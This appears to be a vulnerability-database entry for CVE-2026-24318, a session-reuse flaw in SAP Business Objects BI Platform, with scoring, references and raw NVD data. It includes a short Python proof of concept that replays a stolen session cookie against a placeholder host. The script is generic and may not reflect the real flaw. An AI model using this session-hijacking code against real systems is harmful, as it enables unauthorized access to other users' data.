CVE-2026-24318

Description

Due to an Insecure session management vulnerability in SAP Business Objects Business Intelligence Platform, an unauthenticated attacker could obtain valid session tokens and reuse them to gain unauthorized access to a victim�s session. If the application continues to accept previously issued tokens after authentication, the attacker could assume the victim�s authenticated context. This could allow the attacker to access or modify information within the victim�s session scope, impacting confidentiality and integrity, while availability remains unaffected.

CVSS Details

CVSS Score

4.2

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

SAP Business Objects Business Intelligence Platform (具体受影响版本请参考SAP Security Note 3702191)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Proof of Concept for CVE-2026-24318
# Demonstrates session reuse due to insecure session management

target_host = "https://sap-bi-server.example.com"
login_endpoint = "/biprws/logon/long"
protected_resource = "/biprws/infostore"

# Attacker intercepts or guesses a valid session token (e.g., JSESSIONID)
# In a real attack, this might be obtained via XSS or network sniffing
stolen_cookies = {
    "JSESSIONID": "0000XXXXXXXXXXXXXXXXXXXX"
}

try:
    # Attempt to access a protected resource using the stolen token
    print("[*] Attempting to access resource using stolen session token...")
    response = requests.get(target_host + protected_resource, cookies=stolen_cookies, verify=False)

    if response.status_code == 200:
        print("[+] Exploit successful! Server accepted the session token.")
        print("[+] Leaked Data:")
        print(response.text[:500]) # Print first 500 chars of response
    else:
        print(f"[-] Exploit failed. Status code: {response.status_code}")

except Exception as e:
    print(f"[!] Error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-24318
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-24318
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-24318/
[4] VulDB https://vuldb.com/cve/CVE-2026-24318
[5] https://me.sap.com/notes/3702191
[6] https://url.sap/sapsecuritypatchday

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-24318", "sourceIdentifier": "[email protected]", "published": "2026-04-14T00:16:04.913", "lastModified": "2026-04-17T15:18:16.507", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Due to an Insecure session management vulnerability in SAP Business Objects Business Intelligence Platform, an unauthenticated attacker could obtain valid session tokens and reuse them to gain unauthorized access to a victim�s session. If the application continues to accept previously issued tokens after authentication, the attacker could assume the victim�s authenticated context. This could allow the attacker to access or modify information within the victim�s session scope, impacting confidentiality and integrity, while availability remains unaffected."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 4.2, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-539"}]}], "references": [{"url": "https://me.sap.com/notes/3702191", "source": "[email protected]"}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]"}]}}